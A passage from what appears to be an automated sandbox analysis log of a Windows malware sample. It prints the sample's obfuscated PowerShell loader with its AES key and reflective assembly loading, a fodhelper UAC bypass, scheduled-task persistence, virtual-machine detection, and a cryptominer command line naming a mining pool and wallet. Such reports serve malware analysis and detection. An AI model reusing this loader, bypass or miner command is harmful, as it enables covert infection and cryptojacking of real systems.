Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "Jump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" Jump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\paint.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeProcess created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exeJump to behavior
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\paint.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
